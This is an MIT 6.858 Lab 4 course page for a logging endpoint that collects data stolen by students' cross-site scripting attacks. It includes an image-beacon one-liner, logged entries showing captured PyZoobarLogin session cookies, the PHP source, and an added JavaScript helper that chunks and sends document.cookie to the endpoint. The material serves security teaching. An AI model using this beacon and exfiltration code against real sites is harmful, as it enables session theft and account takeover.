Lab 4 Logging Script

You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:

(new Image()).src='https://css.csail.mit.edu/6.858/2022/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding. Note also that the payload travels as a query-string value: an unencoded '&', '#' or '+' inside it will truncate or alter what the server receives (everything after a '#' never leaves the browser), so pass stolen data through encodeURIComponent before appending it. As the source code below shows, the script also rejects an id or payload longer than 1000 bytes, rejects an identical payload resent within 5 seconds (HTTP 429), replaces newlines in the logged values with '.', and keeps only the 100 most recent entries.
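As an added example (not part of the lab page or the 6.858 course code), here is a small client-side helper that builds the same image beacon with proper percent-encoding, shows what log.php would actually receive if the payload were concatenated unencoded, splits a long value into numbered chunks that fit the 1000-byte limit enforced by the script, and packs a multi-line snippet into a single-line javascript: URL. The endpoint URL is the one printed above; the helper names, the "i/n:" chunk prefix and the assumption that the stolen data is ASCII (one byte per character) are assumptions of this example.

```javascript
// Added example, not from the 6.858 lab page. Assumes the log.php endpoint printed
// on the page; the 1000-byte limit and the "same payload within 5 s" rejection are
// the checks in the page's PHP source. Chunking assumes ASCII data (1 byte/char).
const LOG_URL = 'https://css.csail.mit.edu/6.858/2022/labs/log.php';
const MAX_BYTES = 1000; // log.php rejects an id or payload longer than this

// Naive concatenation, as in the page's one-liner: fine for plain strings, but
// '&', '#' or '+' in the payload corrupt the query string.
function naiveLogUrl(id, payload) {
  return LOG_URL + '?id=' + id + '&payload=' + payload + '&random=' + Math.random();
}

// Percent-encode each value so '&', '#', '+', '=' and spaces survive the trip.
function buildLogUrl(id, payload, random = Math.random()) {
  return LOG_URL +
    '?id=' + encodeURIComponent(id) +
    '&payload=' + encodeURIComponent(payload) +
    '&random=' + encodeURIComponent(String(random));
}

// What log.php sees for a given URL: the URL-decoded query values. Anything after
// '#' is a fragment and is never sent to the server.
function serverSees(url) {
  const u = new URL(url);
  return { id: u.searchParams.get('id'), payload: u.searchParams.get('payload') };
}

// Split a long secret into numbered chunks that each fit under MAX_BYTES.
// The "i/n:" prefix keeps every chunk distinct (the server drops an exact
// duplicate seen within the last 5 s) and lets you reassemble them from the log.
function chunkPayload(data, maxBytes = MAX_BYTES) {
  const room = maxBytes - 12; // leave space for an "nnnnn/nnnnn:" prefix
  const n = Math.max(1, Math.ceil(data.length / room));
  const chunks = [];
  for (let i = 0; i < n; i++) {
    chunks.push((i + 1) + '/' + n + ':' + data.slice(i * room, (i + 1) * room));
  }
  return chunks;
}

// One beacon URL per chunk, each with its own cache-busting random value.
function exfiltrateUrls(id, data) {
  return chunkPayload(data).map((chunk) => buildLogUrl(id, chunk));
}

// Fire an image beacon. Returns false outside a browser (e.g. under Node).
function sendBeacon(url) {
  if (typeof Image === 'undefined') return false;
  (new Image()).src = url;
  return true;
}

// Pack a multi-line snippet into a single-line javascript: URL. The browser
// percent-decodes the URL before evaluating it, so %0A becomes a newline again;
// wrapping the code in a function expression keeps the link from navigating.
function javascriptHref(code) {
  return 'javascript:' + encodeURIComponent('(function(){' + code + '})()');
}

// Typical use: exfiltrateUrls('my-username', document.cookie).forEach(sendBeacon);
```

The serverSees() helper is the check worth keeping around while you debug: run it on the exact string your injected script builds, and if the payload comes back truncated the problem is encoding, not the server.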

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)


ID: (some identifier to locate your payload in the log)

Payload: (the information you stole)

Logged entries

Below are the most recent logged entries, so that you can check if your attack worked:

Thu, 08 Feb 2024 19:56:52 -0500: my-username: some-string
Thu, 08 Feb 2024 17:27:41 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390
Thu, 08 Feb 2024 17:20:46 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390
Thu, 08 Feb 2024 16:50:11 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390
Thu, 08 Feb 2024 14:51:40 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390
Thu, 08 Feb 2024 14:51:26 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390
Thu, 08 Feb 2024 14:51:17 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390
Thu, 08 Feb 2024 14:51:09 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390
Thu, 08 Feb 2024 14:50:28 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390
Thu, 08 Feb 2024 14:43:03 -0500: rollhens: PyZoobarLogin=attacker#239acc7bc484d98518569b656afdab9d
Thu, 08 Feb 2024 14:23:48 -0500: my-username: some-string
Thu, 08 Feb 2024 14:14:08 -0500: my-username: some-string
Thu, 08 Feb 2024 14:12:32 -0500: rollhens: anything
Thu, 08 Feb 2024 14:11:47 -0500: rollhens: grader#6f48488db081f989df80914e49b45e83
Tue, 23 Jan 2024 03:52:09 -0500: test: PyZoobarLogin=grader#fd6c8a524f411982bd4f35624ffeb631
Tue, 23 Jan 2024 03:52:04 -0500: test: PyZoobarLogin=grader#8ad06fac69108b9eb668b0e9547fae22
Tue, 23 Jan 2024 03:51:55 -0500: test: PyZoobarLogin=grader#0d7b7b55efe4de39d32cd5e42560f015
Tue, 23 Jan 2024 03:46:40 -0500: test: PyZoobarLogin=grader#1b99b3224cfa192f75f92b0a0faea40f
Tue, 23 Jan 2024 03:46:35 -0500: test: PyZoobarLogin=grader#ea844c2f531bec27c0bdcb23cb7952a9
Tue, 23 Jan 2024 03:46:26 -0500: test: PyZoobarLogin=grader#f950b04232ef4e8c85b4d65288d04d45
Tue, 23 Jan 2024 03:26:21 -0500: test: PyZoobarLogin=grader#a647d38c4f85735565c8bd477aa678ea
Tue, 23 Jan 2024 03:26:16 -0500: test: PyZoobarLogin=grader#89aaf043051a98511c2fec0ec6935c94
Tue, 23 Jan 2024 03:26:06 -0500: test: PyZoobarLogin=grader#25dd0471c0576af3c4cf787f1f93759b
Tue, 23 Jan 2024 03:19:39 -0500: test: www-www
Tue, 23 Jan 2024 03:18:17 -0500: test: 111-111
Tue, 23 Jan 2024 03:17:22 -0500: test: testtestst-2
Tue, 23 Jan 2024 03:10:16 -0500: test: 1234-12345
Tue, 23 Jan 2024 03:03:44 -0500: test: 12345-12345
Tue, 23 Jan 2024 03:02:54 -0500: test: 12345-12345
Tue, 23 Jan 2024 02:56:38 -0500: test: 123-12345
Tue, 23 Jan 2024 02:39:25 -0500: test: 12345-12345
Tue, 23 Jan 2024 02:39:19 -0500: test: 12345-12345
Tue, 23 Jan 2024 02:39:13 -0500: test: 12345-12345
Tue, 23 Jan 2024 02:39:07 -0500: test: 12345-12345
Tue, 23 Jan 2024 02:39:01 -0500: test: 12345-12345
Tue, 23 Jan 2024 02:34:30 -0500: test: test-test2
Tue, 23 Jan 2024 02:26:20 -0500: test: 123-12345
Tue, 23 Jan 2024 02:25:47 -0500: test: 123-12345
Tue, 23 Jan 2024 02:25:27 -0500: test: 123-
Tue, 23 Jan 2024 02:21:19 -0500: test: 123-1234
Tue, 23 Jan 2024 02:21:16 -0500: test: 123-
Tue, 23 Jan 2024 02:00:20 -0500: test: PyZoobarLogin=test#2c163d25cdb449efd8a5b7f2983b0862
Tue, 23 Jan 2024 01:58:45 -0500: test: PyZoobarLogin=test#2c163d25cdb449efd8a5b7f2983b0862
Tue, 23 Jan 2024 01:40:41 -0500: test: PyZoobarLogin=grader#2f8e65d359b1559a3b273cf950dab4e1
Tue, 23 Jan 2024 01:40:35 -0500: test: PyZoobarLogin=grader#db5ffcaeaba860b69edb3638b6650e52
Tue, 23 Jan 2024 01:40:26 -0500: test: PyZoobarLogin=grader#cf4d3d683d01a5e7cb1f79cd55b51a67
Tue, 23 Jan 2024 01:39:46 -0500: test: PyZoobarLogin=test#aa55f9af1f227e8cf1d42d5b19f5a4a8
Tue, 23 Jan 2024 01:35:27 -0500: test: PyZoobarLogin=test#aa55f9af1f227e8cf1d42d5b19f5a4a8
Tue, 23 Jan 2024 01:23:30 -0500: test: PyZoobarLogin=test#aa55f9af1f227e8cf1d42d5b19f5a4a8

Source code

In case you are curious, here is the source code of this page.


<?php
do {
    // No "id" parameter: this is a plain page view, fall through to the HTML below.
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }

    // $_REQUEST merges GET, POST and cookie parameters.
    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    // note: empty() also rejects the string "0"
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    // apcu_add only succeeds if the key is not already cached (TTL 5 seconds).
    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    // One log entry per line: newlines in the values would forge extra entries.
    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.858-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }

    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    // Keep the newest entry first and at most 100 entries in total.
    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }

    flock($file, LOCK_UN);
    fclose($file);

    echo "Logged!";
    return;
} while (0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.858/2022/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Logging Script</title>
    </head>
    <body>
        <h1>Lab 4 Logging Script</h1>
        <p>
            You can use this server side script to extract data from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause the server to log the payload:
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well.  The ID argument
            will help you distinguish your log entries from those sent by other
            students; we suggest picking your MIT Athena username.  Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 4, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="id">ID:</label><br />
            <input name="id" placeholder="your-mit-username" size="40" />
            <i>(some identifier to locate your payload in the log)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Log" name="log_submit" />
    </form>

    <h2>Logged entries</h2>
    <p>
        Below are the most recent logged entries, so that you can check
            if your attack worked:
    </p>

    <pre class="tty"><?php
        // htmlspecialchars keeps logged payloads from running as HTML/JS in this viewer.
        $lines = file_get_contents("/tmp/6.858-logger.txt");
        echo htmlspecialchars($lines);
    ?></pre>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>